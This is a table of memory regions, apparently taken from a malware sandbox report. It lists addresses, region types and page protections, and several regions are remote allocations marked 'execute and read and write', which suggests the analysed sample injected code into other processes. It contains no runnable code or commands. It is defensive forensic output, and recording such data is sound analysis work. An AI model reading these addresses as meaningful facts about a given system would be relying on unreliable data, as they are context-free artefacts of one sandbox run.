|
stack
|
page read and write
|
||
|
291EBA56000
|
heap
|
page read and write
|
||
|
A32E24D000
|
stack
|
page read and write
|
||
|
2504AD42000
|
heap
|
page read and write
|
||
|
2502D000
|
stack
|
page read and write
|
||
|
252E0000
|
heap
|
page read and write
|
||
|
3140000
|
trusted library allocation
|
page read and write
|
||
|
8D20000
|
direct allocation
|
page read and write
|
||
|
9B67000
|
heap
|
page read and write
|
||
|
8A61000
|
heap
|
page read and write
|
||
|
291EBA3D000
|
heap
|
page read and write
|
||
|
2504ADE4000
|
heap
|
page read and write
|
||
|
E5EC000
|
direct allocation
|
page execute and read and write
|
||
|
6118000
|
trusted library allocation
|
page read and write
|
||
|
291EBA9E000
|
heap
|
page read and write
|
||
|
2918180D000
|
trusted library allocation
|
page read and write
|
||
|
8AA9000
|
heap
|
page read and write
|
||
|
291EBAD1000
|
heap
|
page read and write
|
||
|
25048F2E000
|
heap
|
page read and write
|
||
|
A32D67E000
|
stack
|
page read and write
|
||
|
7FFB4B390000
|
trusted library allocation
|
page read and write
|
||
|
9950000
|
heap
|
page readonly
|
||
|
9AD3000
|
heap
|
page read and write
|
||
|
A32D27F000
|
stack
|
page read and write
|
||
|
7932000
|
heap
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page read and write
|
||
|
291EDC6E000
|
heap
|
page read and write
|
||
|
8CAE000
|
stack
|
page read and write
|
||
|
88AC000
|
remote allocation
|
page execute and read and write
|
||
|
A32E34B000
|
stack
|
page read and write
|
||
|
2504AD00000
|
heap
|
page read and write
|
||
|
B3BE000
|
stack
|
page read and write
|
||
|
2509E000
|
stack
|
page read and write
|
||
|
29180BA5000
|
trusted library allocation
|
page read and write
|
||
|
291EDC43000
|
heap
|
page read and write
|
||
|
354D000
|
heap
|
page read and write
|
||
|
29180BE0000
|
trusted library allocation
|
page read and write
|
||
|
2504ACF8000
|
heap
|
page read and write
|
||
|
9B0B000
|
heap
|
page read and write
|
||
|
291EBA76000
|
heap
|
page read and write
|
||
|
24F2F000
|
stack
|
page read and write
|
||
|
2504AE37000
|
heap
|
page read and write
|
||
|
5906000
|
trusted library allocation
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
A32D0FE000
|
stack
|
page read and write
|
||
|
889C000
|
stack
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
8647000
|
stack
|
page read and write
|
||
|
29180227000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
291EDAF0000
|
heap
|
page read and write
|
||
|
8A30000
|
heap
|
page read and write
|
||
|
A32D77B000
|
stack
|
page read and write
|
||
|
7FFB4B2E7000
|
trusted library allocation
|
page read and write
|
||
|
A32D379000
|
stack
|
page read and write
|
||
|
8A7B000
|
heap
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
8A3E000
|
heap
|
page read and write
|
||
|
3160000
|
trusted library allocation
|
page read and write
|
||
|
9B1F000
|
heap
|
page read and write
|
||
|
A32D1FE000
|
stack
|
page read and write
|
||
|
2504AE0F000
|
heap
|
page read and write
|
||
|
291ED4F0000
|
heap
|
page read and write
|
||
|
25048F1F000
|
heap
|
page read and write
|
||
|
2504AD04000
|
heap
|
page read and write
|
||
|
74AC000
|
remote allocation
|
page execute and read and write
|
||
|
29190001000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
9FEC000
|
direct allocation
|
page execute and read and write
|
||
|
7DF444570000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA0000
|
heap
|
page read and write
|
||
|
291ED950000
|
heap
|
page read and write
|
||
|
25048F42000
|
heap
|
page read and write
|
||
|
344B000
|
trusted library allocation
|
page read and write
|
||
|
74BD000
|
stack
|
page read and write
|
||
|
24E70000
|
heap
|
page read and write
|
||
|
9A30000
|
direct allocation
|
page read and write
|
||
|
5FD9000
|
trusted library allocation
|
page read and write
|
||
|
7B4E000
|
stack
|
page read and write
|
||
|
8A6B000
|
heap
|
page read and write
|
||
|
29181E00000
|
trusted library allocation
|
page read and write
|
||
|
9AA0000
|
heap
|
page read and write
|
||
|
291EBA66000
|
heap
|
page read and write
|
||
|
291EBBA0000
|
heap
|
page readonly
|
||
|
291EBA10000
|
heap
|
page read and write
|
||
|
2515E000
|
stack
|
page read and write
|
||
|
7430000
|
direct allocation
|
page read and write
|
||
|
7F900000
|
trusted library allocation
|
page execute and read and write
|
||
|
349C000
|
stack
|
page read and write
|
||
|
25048E80000
|
heap
|
page read and write
|
||
|
2504AE0F000
|
heap
|
page read and write
|
||
|
A32D6FF000
|
stack
|
page read and write
|
||
|
9A1F000
|
unkown
|
page read and write
|
||
|
9A20000
|
direct allocation
|
page read and write
|
||
|
95EC000
|
direct allocation
|
page execute and read and write
|
||
|
8A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7440000
|
direct allocation
|
page read and write
|
||
|
78E8000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
A32D07F000
|
stack
|
page read and write
|
||
|
EA9000
|
heap
|
page read and write
|
||
|
A9EC000
|
direct allocation
|
page execute and read and write
|
||
|
252CC000
|
stack
|
page read and write
|
||
|
291EDB14000
|
heap
|
page read and write
|
||
|
25048DC0000
|
heap
|
page read and write
|
||
|
9B11000
|
heap
|
page read and write
|
||
|
29180494000
|
trusted library allocation
|
page read and write
|
||
|
94A0000
|
direct allocation
|
page execute and read and write
|
||
|
25048EC1000
|
heap
|
page read and write
|
||
|
291EDBF0000
|
heap
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page execute and read and write
|
||
|
6104000
|
trusted library allocation
|
page read and write
|
||
|
25048EE5000
|
heap
|
page read and write
|
||
|
29181C7C000
|
trusted library allocation
|
page read and write
|
||
|
3150000
|
trusted library allocation
|
page read and write
|
||
|
2523F000
|
stack
|
page read and write
|
||
|
2918190F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
29180481000
|
trusted library allocation
|
page read and write
|
||
|
251C0000
|
remote allocation
|
page read and write
|
||
|
A32E1CE000
|
stack
|
page read and write
|
||
|
291EB9D0000
|
heap
|
page read and write
|
||
|
897B000
|
stack
|
page read and write
|
||
|
2504AD42000
|
heap
|
page read and write
|
||
|
2504ACE8000
|
heap
|
page read and write
|
||
|
2504AE01000
|
heap
|
page read and write
|
||
|
291902FA000
|
trusted library allocation
|
page read and write
|
||
|
25048F2C000
|
heap
|
page read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
9B72000
|
heap
|
page read and write
|
||
|
291ED4D0000
|
heap
|
page execute and read and write
|
||
|
7FFB4B3A0000
|
trusted library allocation
|
page read and write
|
||
|
291804F8000
|
trusted library allocation
|
page read and write
|
||
|
25048F4C000
|
heap
|
page read and write
|
||
|
29181ED3000
|
trusted library allocation
|
page read and write
|
||
|
2504AD11000
|
heap
|
page read and write
|
||
|
291ED962000
|
heap
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
24B10000
|
direct allocation
|
page read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
2504ACF3000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page execute and read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
291EDCA1000
|
heap
|
page read and write
|
||
|
8D40000
|
direct allocation
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
7870000
|
heap
|
page read and write
|
||
|
C7EC000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
|
29190021000
|
trusted library allocation
|
page read and write
|
||
|
9AEC000
|
heap
|
page read and write
|
||
|
25048F3C000
|
heap
|
page read and write
|
||
|
D0DAFFE000
|
stack
|
page read and write
|
||
|
74FA000
|
stack
|
page read and write
|
||
|
291EBBC7000
|
heap
|
page execute and read and write
|
||
|
A32CDAE000
|
stack
|
page read and write
|
||
|
73BD000
|
stack
|
page read and write
|
||
|
3448000
|
trusted library allocation
|
page read and write
|
||
|
291EBC30000
|
heap
|
page read and write
|
||
|
29181CEB000
|
trusted library allocation
|
page read and write
|
||
|
2504ADF4000
|
heap
|
page read and write
|
||
|
29181CAD000
|
trusted library allocation
|
page read and write
|
||
|
317A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B2B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
29181C5A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B104000
|
trusted library allocation
|
page read and write
|
||
|
291902EB000
|
trusted library allocation
|
page read and write
|
||
|
3170000
|
trusted library allocation
|
page read and write
|
||
|
250DF000
|
stack
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
86DD000
|
stack
|
page read and write
|
||
|
8770000
|
trusted library allocation
|
page read and write
|
||
|
29181C80000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B110000
|
trusted library allocation
|
page read and write
|
||
|
25048F27000
|
heap
|
page read and write
|
||
|
7470000
|
direct allocation
|
page read and write
|
||
|
A32CDEF000
|
stack
|
page read and write
|
||
|
871F000
|
stack
|
page read and write
|
||
|
7FFB4B2E2000
|
trusted library allocation
|
page read and write
|
||
|
7610000
|
heap
|
page read and write
|
||
|
2504AD07000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library allocation
|
page read and write
|
||
|
291EBB70000
|
trusted library allocation
|
page read and write
|
||
|
36FE000
|
stack
|
page read and write
|
||
|
A32D3FE000
|
stack
|
page read and write
|
||
|
25048F47000
|
heap
|
page read and write
|
||
|
A32D3F7000
|
stack
|
page read and write
|
||
|
375E000
|
stack
|
page read and write
|
||
|
291804A5000
|
trusted library allocation
|
page read and write
|
||
|
2504AE1B000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
291EDB10000
|
heap
|
page read and write
|
||
|
3715000
|
heap
|
page execute and read and write
|
||
|
29180001000
|
trusted library allocation
|
page read and write
|
||
|
3169000
|
trusted library allocation
|
page read and write
|
||
|
78E4000
|
heap
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
EA5000
|
heap
|
page read and write
|
||
|
25048E80000
|
heap
|
page read and write
|
||
|
8C40000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D0DAEFD000
|
stack
|
page read and write
|
||
|
591E000
|
trusted library allocation
|
page read and write
|
||
|
2504ACE4000
|
heap
|
page read and write
|
||
|
29180BD3000
|
trusted library allocation
|
page read and write
|
||
|
291EBABF000
|
heap
|
page read and write
|
||
|
4F71000
|
trusted library allocation
|
page read and write
|
||
|
24F6E000
|
stack
|
page read and write
|
||
|
7FFB4B3D0000
|
trusted library allocation
|
page read and write
|
||
|
25048F29000
|
heap
|
page read and write
|
||
|
D0DB2FF000
|
stack
|
page read and write
|
||
|
291ED3E0000
|
trusted library allocation
|
page read and write
|
||
|
25048F28000
|
heap
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
2504ACE1000
|
heap
|
page read and write
|
||
|
29180478000
|
trusted library allocation
|
page read and write
|
||
|
8D00000
|
trusted library allocation
|
page read and write
|
||
|
25048E58000
|
heap
|
page read and write
|
||
|
8D30000
|
direct allocation
|
page read and write
|
||
|
291EDCAE000
|
heap
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
24AF0000
|
direct allocation
|
page read and write
|
||
|
251C0000
|
remote allocation
|
page read and write
|
||
|
29181C6F000
|
trusted library allocation
|
page read and write
|
||
|
7CBC000
|
stack
|
page read and write
|
||
|
308F000
|
stack
|
page read and write
|
||
|
7B8D000
|
stack
|
page read and write
|
||
|
3185000
|
trusted library allocation
|
page execute and read and write
|
||
|
2504ACEB000
|
heap
|
page read and write
|
||
|
25048F31000
|
heap
|
page read and write
|
||
|
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
|
291804BA000
|
trusted library allocation
|
page read and write
|
||
|
2504ACFB000
|
heap
|
page read and write
|
||
|
291EDCA6000
|
heap
|
page read and write
|
||
|
9B2D000
|
heap
|
page read and write
|
||
|
7450000
|
direct allocation
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
9B67000
|
heap
|
page read and write
|
||
|
7FFB4B102000
|
trusted library allocation
|
page read and write
|
||
|
25048E8F000
|
heap
|
page read and write
|
||
|
36BE000
|
stack
|
page read and write
|
||
|
291EDFC0000
|
heap
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
37CA000
|
heap
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
24B00000
|
direct allocation
|
page read and write
|
||
|
291ED504000
|
heap
|
page read and write
|
||
|
291EDA3D000
|
heap
|
page read and write
|
||
|
2511D000
|
stack
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
5924000
|
trusted library allocation
|
page read and write
|
||
|
291EDC52000
|
heap
|
page read and write
|
||
|
24AD0000
|
direct allocation
|
page read and write
|
||
|
3510000
|
trusted library allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
7FFB4B1B6000
|
trusted library allocation
|
page read and write
|
||
|
9B28000
|
heap
|
page read and write
|
||
|
A32D4F8000
|
stack
|
page read and write
|
||
|
2504AD0C000
|
heap
|
page read and write
|
||
|
291EDC2E000
|
heap
|
page read and write
|
||
|
7FFB4B11B000
|
trusted library allocation
|
page read and write
|
||
|
291EBA27000
|
heap
|
page read and write
|
||
|
25049105000
|
heap
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page read and write
|
||
|
6AAC000
|
remote allocation
|
page execute and read and write
|
||
|
291EBAA9000
|
heap
|
page read and write
|
||
|
2504AD11000
|
heap
|
page read and write
|
||
|
8980000
|
heap
|
page read and write
|
||
|
2ECB000
|
stack
|
page read and write
|
||
|
2504AE1E000
|
heap
|
page read and write
|
||
|
343F000
|
stack
|
page read and write
|
||
|
250490D0000
|
heap
|
page read and write
|
||
|
5F71000
|
trusted library allocation
|
page read and write
|
||
|
31F0000
|
heap
|
page readonly
|
||
|
291815E0000
|
trusted library allocation
|
page read and write
|
||
|
4CAC000
|
remote allocation
|
page execute and read and write
|
||
|
8CEC000
|
stack
|
page read and write
|
||
|
D1EC000
|
direct allocation
|
page execute and read and write
|
||
|
2504ADFF000
|
heap
|
page read and write
|
||
|
2504ACE1000
|
heap
|
page read and write
|
||
|
2528B000
|
stack
|
page read and write
|
||
|
29181C93000
|
trusted library allocation
|
page read and write
|
||
|
7C00000
|
trusted library allocation
|
page read and write
|
||
|
3153000
|
trusted library allocation
|
page execute and read and write
|
||
|
9A70000
|
heap
|
page read and write
|
||
|
8C50000
|
trusted library allocation
|
page read and write
|
||
|
789C000
|
heap
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B370000
|
trusted library allocation
|
page read and write
|
||
|
A32D479000
|
stack
|
page read and write
|
||
|
7FFB4B10D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B380000
|
trusted library allocation
|
page read and write
|
||
|
7ACE000
|
stack
|
page read and write
|
||
|
291EBBB0000
|
trusted library allocation
|
page read and write
|
||
|
9B18000
|
heap
|
page read and write
|
||
|
29180BBC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B430000
|
trusted library allocation
|
page read and write
|
||
|
24EEE000
|
stack
|
page read and write
|
||
|
DBC000
|
stack
|
page read and write
|
||
|
291EDA0A000
|
heap
|
page read and write
|
||
|
42AC000
|
remote allocation
|
page execute and read and write
|
||
|
2504ACF4000
|
heap
|
page read and write
|
||
|
367E000
|
stack
|
page read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
8A50000
|
heap
|
page read and write
|
||
|
4FD3000
|
trusted library allocation
|
page read and write
|
||
|
3154000
|
trusted library allocation
|
page read and write
|
||
|
29181CEF000
|
trusted library allocation
|
page read and write
|
||
|
2504AD11000
|
heap
|
page read and write
|
||
|
DF8000
|
stack
|
page read and write
|
||
|
4160000
|
remote allocation
|
page execute and read and write
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
D0DB0FE000
|
stack
|
page read and write
|
||
|
315D000
|
trusted library allocation
|
page execute and read and write
|
||
|
78D3000
|
heap
|
page read and write
|
||
|
89DD000
|
stack
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
8A6F000
|
heap
|
page read and write
|
||
|
7EAC000
|
remote allocation
|
page execute and read and write
|
||
|
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
|
D0DA8FE000
|
stack
|
page read and write
|
||
|
25048F31000
|
heap
|
page read and write
|
||
|
37C0000
|
heap
|
page read and write
|
||
|
9B72000
|
heap
|
page read and write
|
||
|
7FFB4B3C0000
|
trusted library allocation
|
page read and write
|
||
|
291EBBC0000
|
heap
|
page execute and read and write
|
||
|
2504AD11000
|
heap
|
page read and write
|
||
|
3790000
|
heap
|
page read and write
|
||
|
25048F4A000
|
heap
|
page read and write
|
||
|
24FED000
|
stack
|
page read and write
|
||
|
7B0E000
|
stack
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
A32E2CB000
|
stack
|
page read and write
|
||
|
8D10000
|
direct allocation
|
page read and write
|
||
|
9A50000
|
direct allocation
|
page read and write
|
||
|
7A80000
|
heap
|
page execute and read and write
|
||
|
8750000
|
trusted library allocation
|
page read and write
|
||
|
7BF0000
|
trusted library allocation
|
page read and write
|
||
|
25048F1F000
|
heap
|
page read and write
|
||
|
9960000
|
heap
|
page read and write
|
||
|
37A8000
|
trusted library allocation
|
page read and write
|
||
|
37A0000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
trusted library section
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
2918094A000
|
trusted library allocation
|
page read and write
|
||
|
D0DA9FE000
|
stack
|
page read and write
|
||
|
9940000
|
heap
|
page read and write
|
||
|
291ED972000
|
heap
|
page read and write
|
||
|
291EBBF0000
|
heap
|
page read and write
|
||
|
56AC000
|
remote allocation
|
page execute and read and write
|
||
|
9B2D000
|
heap
|
page read and write
|
||
|
29181D03000
|
trusted library allocation
|
page read and write
|
||
|
7420000
|
direct allocation
|
page read and write
|
||
|
A32D2FE000
|
stack
|
page read and write
|
||
|
25048F1F000
|
heap
|
page read and write
|
||
|
7600000
|
heap
|
page read and write
|
||
|
25048DA0000
|
heap
|
page read and write
|
||
|
9860000
|
heap
|
page read and write
|
||
|
50C8000
|
trusted library allocation
|
page read and write
|
||
|
9B13000
|
heap
|
page read and write
|
||
|
D0DACFF000
|
stack
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
25048F29000
|
heap
|
page read and write
|
||
|
25048F29000
|
heap
|
page read and write
|
||
|
8D80000
|
direct allocation
|
page read and write
|
||
|
25048F47000
|
heap
|
page read and write
|
||
|
2504AE1F000
|
heap
|
page read and write
|
||
|
9B6F000
|
heap
|
page read and write
|
||
|
7FFB4B1BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B103000
|
trusted library allocation
|
page execute and read and write
|
||
|
9AAA000
|
heap
|
page read and write
|
||
|
A32E14E000
|
stack
|
page read and write
|
||
|
25048F43000
|
heap
|
page read and write
|
||
|
291806CA000
|
trusted library allocation
|
page read and write
|
||
|
D0DB1FB000
|
stack
|
page read and write
|
||
|
A32D5FE000
|
stack
|
page read and write
|
||
|
9A40000
|
direct allocation
|
page read and write
|
||
|
29180490000
|
trusted library allocation
|
page read and write
|
||
|
25490000
|
heap
|
page read and write
|
||
|
291EDCBF000
|
heap
|
page read and write
|
||
|
25048D90000
|
heap
|
page read and write
|
||
|
7460000
|
direct allocation
|
page read and write
|
||
|
31EE000
|
stack
|
page read and write
|
||
|
7FFB4B1E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
72EE000
|
stack
|
page read and write
|
There are 501 hidden memdumps, click here to show them.